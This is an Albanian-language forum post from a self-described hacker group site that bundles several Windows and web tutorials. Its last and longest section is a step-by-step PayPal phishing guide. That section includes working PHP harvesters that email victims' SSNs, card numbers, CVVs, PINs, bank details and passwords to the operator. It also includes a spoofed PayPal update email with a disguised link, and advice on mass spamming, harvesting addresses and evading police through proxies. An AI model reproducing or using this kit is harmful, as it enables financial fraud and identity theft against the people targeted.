Monday, 04.23.2018, 10:30 PM
Welcome Guest | RSS
Albanian Hackers Group
Main
Sign Up
Login
Site menu

Seksioni kategoris
My files [147]

Bookmark website

Sondazhi Yne
Votoni webin
Total of answers: 825

Statistika

Total online: 1
Guests: 1
Users: 0

Main » Files » My files

Disa Tutoriale :)
05.26.2012, 3:38 AM
shehi Dosjet ne Fotografi


Pershendetje te gjitheve, ne kete tutorial do tju tregoj se si ti fshehim dosjet tona file apo ndonje gje ne nje

fotografi te formatit "jpg".

Para disa koheve disa gazetar Amerikan afermojn se terroristat Islamik i merrshin dhe dergoshin informacione permes Ebay, duke i fshehur ne fototgrafit JPG.


Duhet te kemi 1 software siq esht "winRar" e natyrisht nje fotografi jpg qe mund te krojoni me njeher ne Paint.

Ja fillojm duke futur documentin apo dosjen tone ne nje arkiv rar.

Celom CMD duke shkuar keshtu Start-> Run -> dhe e shkruam cmd dhe enter.

Ne skemen e prorompt japim kete komand te thjesht:

copy /b "C:\emri_file.jpg” + "C:\emri_file.rar” "C:\file_i_ri.jpg”

Do te thot nese eshte arkivi per ta mshefur img qe duhet te mbaj dosjen, gjinden ne c:\

file_i_ri.jpg qe mund te visualizohet normalisht si cfare do fotografije tjeter.

Per ta vizualixuar dosjen tjeter ju mjafton te ndrroni emrin prej jpg ne rar, ose me nje software falas

"rinominer.exe"

Fund </>

==================================================================

Si te ndani Arkivat (Rar, Zip, etj...)

Hapni WinRAR-in apo ndonje dosje qe eshte e arkivume qe hapet me WinRAR .
Te MENU-ja lart e keni File Commands e kshtu me rradh ju e zgjedhni Options , pastaj Settings apo direkt si te hapni WinRAR-in shtypni CTRL+S .
Tani shkoni te Compression , pak me posht e keni Create Deafault: edhe tani e keni formatin e arkivav RAR & ZIP .
Shiko foton per me shum tek e para e zgjedhni metoden e kompresimit ndersa tek e dyta e shkruani madhesin e ndarjen ( p.s per rapidshare ju duhet me len 100 Mb apo 100 000 000 bait(bytes). 
Imazh

===========================================================
Si ta gjejm IP adrese tone - Windows 2000 dhe XP

Te Windows 2000 et XP, duhet te perdorim komanden ipconfig per ta gjetur IP adrese . Fatkeqesisht,kur e eksekutojm kete komand dritarja mbyllet shume shpejt pa patur mundesi qe ta lexojm numrin mire. Per ta evituar kete problem duhet shkruar kete komande cmd /k ipconfig
Pra :
Start
run
dhe shkruajm
cmd /k ipconfig
apo CMD Tani pasi te Hapet CMD mundeni
ipconfig/all 
===========================================================
Si Ta SHpejtojm Afishimin e Menys START

Duhet Të interevenojm Në Regjister

(para qdo intervenimi ne regjister eshte e domosdoshme qe te bejme nje backup te regjistrit)
shko keshtu :

Start-->>Run -->>Regedit-->> Dhe Vazhdo OK

Tani Kërkoni Kët Qelësa (apo shkoni në Kët QeLës
HKEY_CURRENT_USER\Control Panel\Desktop\
Në Anen e Djathtë Të Dritarës " MenuShowDelay " kliko dy here mbi ë dhe ne dritaren tjeter qe hapet
ndrysho vleren(default është 400 ) në 0 e BëNi
===========================================================
Si Të Ja Ndërrojm Windowsit Të dhënat Intel IBM apo Siq e Keni JU !! Ne My Computer Properties


Në Qoftse Jeni të Interesuar Ta BëNi PC E Juaj Pentium 5
Ja Mundeni Të Veproni Kështu :D Fore

Shembull :intel pentium (R) 4 3.000 Ghz Kët Mundeni me Ja Ndërru
Si te Keni Qef Me Pa A është E Vertetë Ja Veponi KëShtu:

ShkonNi Start>Run e Shenoni Në run "Regedit">pastaj
shkonNi Në Qelësin
HKEY_LOCAL_MACHINE>HARDWARE>DESCRIPTION>SYSTEM>CentralProcessor>O> Pastaj Shkon TeK ProcessorNameString Edhe Këtu Mundeni Me Ja Ndryshuar !!
Tutu i Thjesht :!: 
===========================================================
nstalimi i vbulletin ne host/


Për të instaluar Vbulletin forum duhet ti posedoni këto artikuj:


1.Host do me than Webspace .... orginal host ose 
Kodi:
( funpic.de orgfree.com

etj.)

2.Pastaj ne FTP tuaj Hapni nji folder me emnin FORUM edhe mrena i vendosni fajllat TE CILAT gjenden ne FOlderin UPLOAD

3.Pastaj ne Folderin /Includes Fajllin config.php e editoni (Open WIth) Word Pad ose Notepad..

4. Editimi bëhet kështu ....

Imazh

6.Masi ta mbarojm editimin mbaruam me CONGIF.php dhe nese se keni ne FTP tuaj vendoseni te folderi /Includes ( verejtje versioni 3.6.2 e ka config.php.new pra dueht tja boni emrin ne config.php veq se se pranon tjeter qysh)

7.Tash nese e keni keshtu .... 
Kodi:
www.emnihostit.com/forum/install/install.php

8.Tash i keni 13 hape deri te instalimi i forumin Veq Next - Next ...

9. Ne fund pasi te zgjedhni emnin e Administratori Ne dunf lypet qe te fshihet Fajlli Install.php prej te folderi /Install ( ju preferoj qe ti fshini krejt fajllat qe jon ne ate folder SE keto Ne ardhmeri Paraqesin BIRUCA )

Nese i percjellni keto Hape forumi juaj instalohet me sukses...

Thnx For Tuto Hac A Good Time With VB
===========================================================
Auto Pytje qe duhet tja Beni Veti:

1. Tools/Scripte Që Nevoiten
2. Si Të Ndjeni Veten Sigurt ?
3. Cfar Rezikoni Kur Beni Spam ?1. Tools/Scripte Që Nevoiten/ Si Të Veproni ? 
Cito:
= 1.Webhost Me PHP Support Për " SCAM/Page "
= 2.Webhost Me PHP Support Për " CN™ PHP-Mailer "
= 3.Program Për Gjetjen e E-Mails" E-Mail Spider 7 "
= 4.Hapje Të Një Akonti Në "http://mail.yahoo.com" Një E-Mail Free Pra " Emri@Yahoo.Com "
= 5.Mozilla Firefox 1.0.2
= 6.WEB SSL Conntection " Anonym "

Ok Së Pari Vazhdojm i Gjeni Ose Bleni Host Me PHP Support Per "Scam Page" Nuk e Dini Cka Eshte Scam Page ?
Scam Page Eshte Kopjim i Nje Faqes Origjinale Si P.Sh. PayPal.com eBay.com Scam Page Nevoitet Shum
Per Me Be Spam Pra Ne Scam Page Ku e Keni Lene Pra Scam Tash .P.Sh e Keni Be Upload Scam Page Dikund
e Hapeni PHP-Mailer Prej Ne PHP mailer Dergoni Nje HTML Code Me Krejt Te Dhenat Kishe Jeni Ju Firma PayPal
e Kur Te SHkon Viktimes Ne E-Mail Ai Mendon Se PayPali i Ka Dergu E-Mail Dhe e Hap Dhe Hyn Ne Scam Page pra
Te Faqja Juaj ku e keni Scam Page aty i Shenon Te Dhenat e Veta Dhe Ato Te Dhena Direkt Dergohen ne E-Mail Te Juaj.

Ok Vazhdojm Tash Pasi Te Beni Scam Page Upload Pik Se Pari Duhet Me Konfiguru/Perpunu Scriptad Eshte Shum Leht

PayPal Scam Page ( duhet ta gjeni ket download link ) Kerko:
Pasi Te Beni Download Beni Extract Nga .RAR Arkivi e Pastaj Hyni Deri Ne Fund Ku Jan Faqet index.html etj.
aty do te shihni 2 scripta qe nevoiten per dergimin e Te Dhenave Jan Ne .php:
login.php

Kodi:
session_start();

$first_name = $_POST['first_name'];
$middle_name = $_POST['middle_name'];
$last_name = $_POST['last_name'];
$address1 = $_POST['address1'];
$address2 = $_POST['address2'];
$city = $_POST['city'];
$state = $_POST['state'];
$zip = $_POST['zip'];
$country = $_POST['country'];
$night_phone_a = $_POST['night_phone_a'];
$night_phone_b = $_POST['night_phone_b'];
$night_phone_c = $_POST['night_phone_c'];
$ssn1 = $_POST['ssn1'];
$ssn2 = $_POST['ssn2'];
$ssn3 = $_POST['ssn3'];
$mmn = $_POST['mmn'];
$dl_number = $_POST['dl_number'];
$dl_state = $_POST['dl_state'];
$dob_mm = $_POST['dob_mm'];
$dob_dd = $_POST['dob_dd'];
$dob_yy = $_POST['dob_yy'];
$cardtype = $_POST['cardtype'];
$ccholder = $_POST['ccholder'];
$ccnumber = $_POST['ccnumber'];
$month = $_POST['month'];
$year = $_POST['year'];
$pin = $_POST['pin'];
$cvv = $_POST['cvv'];
$bank_name = $_POST['bank_name'];
$bankphone = $_POST['bankphone'];
$bank_routing = $_POST['bank_routing'];
$bankaccountnumber = $_POST['bankaccountnumber'];
$emailid = $_POST['emailid'];
$paypal_passwd = $_POST['paypal_passwd'];

//Dërgimi E-Mail

Kodi:
$subj = " PayPal Viktim ( Taze ) ";
$msg = "Emri: $first_name\nEmri Mesëm: $middle_name\nMbiemri: $last_name\nAddressa: $address1\nAddressa2: $address2\nQyteti: $city\nShteti: $state\nNumri Postës: $zip\nEsht Nga: $country\nTelefon Numri: $night_phone_a-$night_phone_b-$night_phone_c\nSSN Numri: $ssn1-$ssn2-$ssn3\nPyetja - Mother'sMaidenName: $mmn\nDriver Licence: $dl_number\nIssuedState: $dl_state\nDOB: $dob_mm-$dob_dd-$dob_yy\nTypi KreditKartelës: $cardtype\nEmri Në Kartel: $ccholder\nNumri Kartelës: $ccnumber\nAfati KreditKartelës: $month-$year\nCVV2: $cvv\nATM Pin: $pin\nEmri Bankës: $bank_name\nTelefon Bankës: $bankphone\nRoute/RoutingNumber: $bank_routing\nAkont/Account Number: $bankaccountnumber\n\n\nPowered By CrAcKeR-NiNi and SmA||Er bIgEr™ 2005-2006";
mail("Emri@Yahoo.com", $subj, $msg);
header("Location: Complete.htm");
?>


Ok Keshtu Do Te Jet Scripti Kur Te Hapeni Dhe Ju Nuk Keni Shum Pun Vetem Editoni/Ndryshoni E-Mail Qe Shkruan Aty "Emri@Yahoo.com"
Dhe Beni Save. Ose STRG+S Vazhdojm Pasi Tash e Perpunuat Me Suksess "login.php" Vazhdojm me:

processing.php


session_start();

$login_email = $_POST['login_email'];
$login_password = $_POST['login_password'];

//E-Mail Informatat Dërgohen Këtu

$subj = " $login_email ";
$msg = "PayPal E-Mail: $login_email\nPayPal FjalKaluesi: $login_password\n\n\nSpammed/Powered By CrAcKeR-NiNi and SmA||Er bIgEr™ 2005-2006";
mail("Emri@Yahoo.com", $subj, $msg);
header("Location: processing.htm");
?>

Edhe Ketu Ndryshoni Vetem E-Mail Beni Save Gati.
Tash Shkoni Tek Te 

Kodi:
www.b-one.net


Kodi:
, ose www.1und1.com

Dhe Bleni Nje Web Me Data Falls Por Perdoreni Proxy Qe Te Jeni Anonym
Pasi Te Bleni e Beni Folderin 
Kodi:
"paypal.com"

Komplet Upload Ne Server Pasi Te Beni Upload Eshte Gati Dhe Testoni Pastaj A Dergon E-Mail mendoj Se Sigurisht Po.

Tash Pasi U Kry Me Scam Page Na Nevoitet Nje PHP-Mailer Une e Perdori Versionin e CN`s Nuk e Dini Cka Eshte PHP-Mailer..
Me PHP-Mailer Keni mundësi Nepermjet PHP Webhosting Me Dergu Mass E-mails Ok.

CN`s PHP-Mailer ( Nuk Duhet Download e Keni Ne Mesim Mrena )
Passi te beni download e beni Upload me Nje Server Tjeter jo aty ku e keni Scam/Page Nje Profi Asnjeher Nuk Vepron Ashtu..
Pra Pasi Te Behet Upload Nuk Dini Ku Qka Me Bo Upload ? hmmm shkoni ketu

Kodi:
www.united-domaind.de


dhe bleni nje web pastaj
aktivizioni Webspace Si Test Per 30 Dit Ajo Automatikisht Lidhet me Webfaqen Tuaj Dhe Hyni Beni Upload PHP-Mailer Tuaj
Pasi E Keni Ber Upload Testoni 
Kodi:
http://webijuaj.com/RS/English/index.php


Dhe Aty Keni Shum Gjera Pra Shenojm Keto.
Kodi:
Your Email:
billing@paypal.com

Reply-To:
Nuk Nevoitet Mos Shenoni Asgje

Subject:
Card/Debit Update

Your Name: PayPal Billing department

Attach File: Nuk Nevoitet Mos Shenoni Mos Perdoreni Asgje Ketu

Plain X> HTML Ketu Zgjedheni HTML


Cito:
-----------------------------------------
Pra Ketu

Do Te Shenoni HTML Kodin Qe Do Ti Dergoni
Viktimit

<html>

<head>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Dear valued PayPal</title>
</head>

<body>

<table class="applicationcontainer managementview" cellSpacing="0" cellPadding="0" width="100%" border="0">
<tr vAlign="top">
<td class="content">
<div id="message">
<a href="http://www.paypal.com/cgi-bin/webscr?cmd=_home" target="_blank">
</a>
<table cellSpacing="0" cellPadding="0" width="600" align="center" border="0">
<tr>
<td colSpan="3">
http://mail.yahoo.com/config/login?/pp.files/pixel.gif</td>
</tr>
</table>


<font size="2"><font face="Verdana">Dear valued
<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">PayPal<sup>®</sup></span>
member</font>:

</font>

</p>


<font face="Verdana" size="2">It has come to our attention that your
<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">
PayPal<sup>®</sup></span> account information needs to be

updated as part of our continuing commitment to protect your account and
to

reduce the instance of fraud on our website. If you could please take 5-10
minutes

out of your online experience and update your personal records you will
not run into

any future problems with the online service.

</p>


However, failure to update your records will result in account
suspension.

Please update your records on or before <font color="red">April
5, 2005.</font>Once you have updated your account records, your
<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">
PayPal<sup>®</sup></span> session will not be

interrupted and will continue as normal. </p>

Kodi:
To update your
<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">
PayPal<sup>®</sup></span> records click on the following link:


<a onmouseover="window.status='https://www.paypal.com/cgi-bin/webscr?cmd=_login-run'; return true;" href="http://www.Webijuaj.com/paypal.com/Secure/Service/mysql/ssl/connection/__/wf34gPaymentLanding&ssPageName=hhpayUSf&=userhgads &secure&ssl7r2vbd7d888/" target="_blank" >
http://www.paypal.com/cgi-bin/webscr?cmd=_login-run</a></p>


</p>


Thank You.

<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">
PayPal<sup>® </sup>UPDATE TEAM</span> </p>


Accounts Management As outlined in our User Agreement,
<span style="FONT-SIZE: 10pt; COLOR: black; FONT-FAMILY: Verdana">
PayPal®</span> will

periodically send you information about site changes and enhancements. </p>

Visit our Privacy Policy and User Agreement if you have any questions.


Kodi:
<a href="http://www.paypal.com/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside" target="_blank">
http://www.paypal.com/cgi-bin/webscr?cm ... cy-outside</a></font></div>
</td>
</tr>
</table>

</body>

</html>


-----------------------------------------

Ok Pra Nuk Jeni Gati Me HTML Kodin Para Duhet Ta Perpunoni Me Macromedia Dreamwaver ose HTML Editor Tjer Ndryshoni Datat Afatin
Dhe Linkin
Kodi:
<a onmouseover="window.status='https://www.paypal.com/cgi-bin/webscr?cmd=_login-run'; return true;" href="http://webfaqjaJuaj.com/paypal.com/Secure/Service/mysql/ssl/connection/__/wf34gPaymentLanding&ssPageName=hhpayUSf&=userhgads &secure&ssl7r2vbd7d888/" target="_blank" >
http://www.paypal.com/cgi-bin/webscr?cmd=_login-run</a></p>


Dhe Mos Harroni Daten Afatin Perpunoni.
Pasi U Kry Tash Nga Ana Tjeter ne PHP-Mail Keni Nje Dialog Te Lart Aty Shenoni E-Mailat qe do te mbledheni Me E-Mail Spider 7
Pasi ti Mbledheni E-Mails Bene Copy/Paste Ne At Dialog Dhe Kshyreni A Eshte Mir Proxy Testoni Njeher A Jeni Mir Anonym Dhe Pastaj
Klikoni SEND MESSAGE Ne PHP-Mailer Dhe Vetem Prisni Sa Te Kryhet Hyni Ne Server Beni Delete PHP-Mailer Edhe Harroni Ate Host Se
Se Shpejti Do Te Ndal Hosti At Faqe Sepse Dikudh Do Te Lajmroj Se Ka Be Spam Dikush Ndersa Aty ku e keni bere Scam Page Uplaod
Ne B-One Zgjat 4/5 Dit dhe Ndalet Ndersa Ne 1and1 2/3 dit dhe tash vetem prisni E-Mail Kur Tju Vjen CC Full Taze Dhe PayPals

E-Mail Spider Kontaktoni " CrAcKeR-NiNi ose shiqoni forumin ton

Hapeni Akontin Ne Yahoo Ku Tju Vjejn E-Mailat e Spammit qe keni be Mos Harroni.

Mozilla Firefox 1.0.2
Kete e Perdori Une Perher Me e Mire Beni Download Kerkoni Ne Google " Download FireFox "


WEB SSL Conntection " Anonym " Nese Se Keni Kete Perdoreni Normal proxy Nga 
Kodi:
www.aliveproxy.com Te Portit 3128 Anonym


2. Si Të Ndjeni Veten Sigurt ?

Nese Ju Vjen Ndonje E-Mail Nga FBI Siq Diqka Nga Spami Mua Me Ka Ndodh 5 Her Kur me Vyshin E-Mails Shkruani FBI-Agent e Tjer
Mos Tuteni Se Keto Jan Njerz Normal Qe Duan Me Ju Tut Qe Te Mos Veproni Me Ju Edini Se Jeni Sigurt Kur Keni Dergu me Proxy Mails
Por Sa Me Mir Shkoni ne Nett Caffe Dhe Prej Atje Mshuani Spam. Asne letre te dyshimt nuk duhet te hapet ( rrepsisht osht e ndaluar ) perdor Hiden Ip original Ose Mos i hy ksaj pune /

3. Cfar Rezikoni Kur Beni Spam ? 

Per Spam Merreni Shum Vite Ne Burg 10 Vjet Burg Ose 5 Nese Jetoni Ne Germany ose jasht 1 shteti tjeter Ju Kisha Lute Mos Veproni Prej Ne Shpi
Keto permbajtje Qe Keni Lexuar nga Un Jan Ngjarje Te Verteta Dhe Vetem Per Teste Une Nuk Pergjigjem per Asnjelloj Jo Mbajtje Ligji

Category: My files | Added by: albanian-hacker
Views: 1069 | Downloads: 0 | Comments: 1 | Rating: 2.0/1
Total comments: 0
Only registered users can add comments.
[ Sign Up | Login ]
Kerko

Share Website

Upload your files

VIDEO


Copyright ALBANIAN-HACKER © 2018
Free web hostinguCoz